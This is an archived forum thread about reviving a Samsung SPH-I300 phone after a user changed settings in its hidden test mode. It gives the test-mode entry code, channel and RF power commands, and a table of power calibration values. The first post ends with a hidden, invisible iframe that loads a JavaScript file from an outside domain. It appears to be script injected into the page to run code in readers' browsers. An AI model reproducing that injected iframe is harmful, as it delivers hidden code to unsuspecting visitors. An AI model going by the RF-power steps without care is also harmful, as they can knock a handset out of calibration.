+ Reply to Thread
Results 1 to 13 of 13

Thread: Test Mode

  1. #1
    Admiral Postmeister nuncio's Avatar
    Join Date
    03-06-2003
    Location
    root, your box
    Posts
    22

    Test Mode

    ARGH!

    Yes, as you have most definitely already guessed I played with the Test Mode (6548#0*45680) function and have rendered my SPH-I300 useless as far as phone service is concerned.

    Currently, after doing a manual reset and (intentionally) resetting to at least the factory Palm settings with no data my phone still displays:

    "Calibration: 0
    TEST_SYS: 30600"

    on the phone screen while on. I believe the 600 refers to the channel number the phone is currently set to and I've no idea what to put it back too, neither does the Sprint tech rep at my local Sprint Store. I showed him a list of Test Code commands when I came in and he said didn't know anything about the test menu.

    If anyone has any idea on how to fix this I'm listening with open ears.

    Thanks,
    Nuncio Estafette<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by nuncio; 08-17-2003 at 03:55 AM.

  2. #2
    sprint pcs beta tester macmetal666's Avatar
    Join Date
    02-27-2003
    Location
    in a house somewhere but not here.
    Posts
    357
    tell me how you got into the programmers codes and i can help you get out.

    there are about three sets of codes and about 3 entry points, i need to know which door you opened so i can get the pilot light lit and get the furnace running again.
    i am aware of two hidden menus also within the phone program of the i300.

    i can get you out!
    my i500 is more obsolete than your ti-99 or apple IIe

  3. #3
    Admiral Postmeister nuncio's Avatar
    Join Date
    03-06-2003
    Location
    root, your box
    Posts
    22
    I did the Channel Selection and Tx Power Output Level Control test. The specifics of what I did are below:

    3. PCS
    A. Enter to Test Mode [ 6 5 4 8 # 0 * 4 5 6 8 0 ]
    B. The command "0 2 0" is mode and channel change
    "30600"
    Mode:PCS
    Channel number
    Push the [ save ] key to save.
    C. "0 0 1" : Suspend.
    D. To finish the Test Mode, You should enter the command "0 0 2".
    E. "0 0 9 0 6 0 0 'END' " : Set to '0600' channel.
    F. "0 0 7" : Carrier On.
    G. "0 3 4" : Spread spectrum to 1.23MHz band width.
    H. "0 7 4 * * * " : Adjust RF power level.
    "* * *" means AGC level and AGC level range is from 000 to 511.

    Also, I called Samsung up today and they said that they couldn't figure out what the reason for the message was but that I should take it to a Sprint Store again and tell them to use the PST to reflash it to an upgraded version and that would probably solve the problem. I haven't gotten the chance to do that yet (maybe tomorrow...).

    Thanks,
    Nuncio
    -Nuncio

  4. #4
    Moist
    Join Date
    06-11-2003
    Posts
    46
    Is there any more info available on this test mode? I just stupidly played with it....almost killed my phone but got it back. Looks like there could be some useful stuff going on in there.

  5. #5
    Admiral Postmeister nuncio's Avatar
    Join Date
    03-06-2003
    Location
    root, your box
    Posts
    22
    Here's the update with regard to flashing my phone with the PST (at Sprint).

    Apparently it won't flash.

    This time I had gone to a different Sprint store because the tech at the store near me was out for the week. The guy I spoke with seemed to be fairly knowledgeable and interested in helping me resolve the problem and I left the phone with him for a day but still to no avail.

    The message remains and the phone still doesn't work.
    Last edited by nuncio; 09-02-2003 at 12:40 AM.
    -Nuncio

  6. #6
    Admiral Postmeister nuncio's Avatar
    Join Date
    03-06-2003
    Location
    root, your box
    Posts
    22
    Final update:

    They updated the PRL and now it works! JOY!!
    -Nuncio

  7. #7
    Moist
    Join Date
    06-11-2003
    Posts
    46
    OK, so here's the deal....when this post first came up I mentioned that I messed with the test mode and almost killed my phone but got it back up. Well, I was half right....I did mess it up a tad.

    The thing that I messed with was that RF power level. Does anyone know what it was supposed to be set at? Or is there a way to set it back to default?

    The problem I'm getting is that a majority of my calls are dropped after 2-5 minutes. The signal bars don't change but it says "signal faded". Wireless web works fine and some calls go through fine.

    Any suggestions. Spring is screwing with me. The store doens't have the cable to test it and its not under warranty so they won't do anything about it.

  8. #8
    Moist
    Join Date
    06-11-2003
    Posts
    46
    OK, if some could be kind enough to do this for me it would be much appreciated.

    enter test mode by pressing 6 5 4 8 # 0 * 4 5 6 8 0
    test mode screen will pop up
    press 074 to get to the adjust RF power level screen
    text and numbers will pop up, don't press anthing other than "save"
    the first one will read
    <23.8 dbx[00]>
    TRAS[00]xxx

    Each time you press save the number before dbx will change along with the xxx number. I need the xxx number the goes with each dbx number. I can't remember which one i changed but that had to be what I screwed up.

    Once you've hit save enough you'll be at the end of the list and it'll bring you back to the main menu.
    At the main menu, press 002 and it will exit and reboot your phone.

    Your phone will start back. The only thing I've found is that it will deactivate some of your x master settings...like the grafiti or logo hack. Other than that everything will be normal.

    I'd really appreciate this if anyone could do it and post all the levels for each dbx level.

  9. #9
    jlv
    jlv is offline
    Tired Member jlv's Avatar
    Join Date
    02-12-2002
    Location
    MA
    Posts
    1,068
    23.8 00 ... 396
    21.0 01 ... 386
    18.0 02 ... 371
    16.0 03 ... 364
    12.0 04 ... 350
    7.5 05 ... 334
    2.0 06 ... 313
    -4.0 07 ... 293
    -11.5 08 ... 269
    -16.5 09 ... 249
    -22.0 10 ... 225
    -28.0 11 ... 199
    -34.0 12 ... 174
    -40.0 13 ... 147
    -44.5 14 ... 126
    -49.5 15 ... 100
    -55.0 16 ... 069

  10. #10
    jlv
    jlv is offline
    Tired Member jlv's Avatar
    Join Date
    02-12-2002
    Location
    MA
    Posts
    1,068
    When my I300 finished resetting, it seemed to take longer to find the Sprint towers (it said "No Service Area" for longer than I remember). But, then all was fine and I was able to dial "*2".

    (my I300 has no service anyway, since my I500 replaced it.)

  11. #11
    Moist
    Join Date
    06-11-2003
    Posts
    46
    Thanks so much! Mine were all too high. I only remember changing one but it must have done them all. I switched them back to what you posted and it restarted and fond a signal right away....I'll have to make some long calls and see how it goes.

    Thanks again!

  12. #12
    sprint pcs beta tester macmetal666's Avatar
    Join Date
    02-27-2003
    Location
    in a house somewhere but not here.
    Posts
    357
    SORRY GUYS...... i had to stay out of this one because i could lose my job and my fcc master license for assisting you on this.

    after the whole harry thing with the i500 you can all understand.....we have narks on this board and i wasnt going to risk it.


    thanks for understanding.
    my i500 is more obsolete than your ti-99 or apple IIe

  13. #13
    Registered User
    Join Date
    10-08-2003
    Location
    Honduras
    Posts
    1

    I500 test mode

    I want to know if any of you guys have info on how to enter the I500 test mode, is it the same as the I300 and I330? I don´t have one with me but will be recieving 15 handsets by Monday. I want to PRL update them. Any ideas on how to do this, currently have UPST and CHA wireless multi samnsung prl updater. But with my UPST I don´t have I500 DLL.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts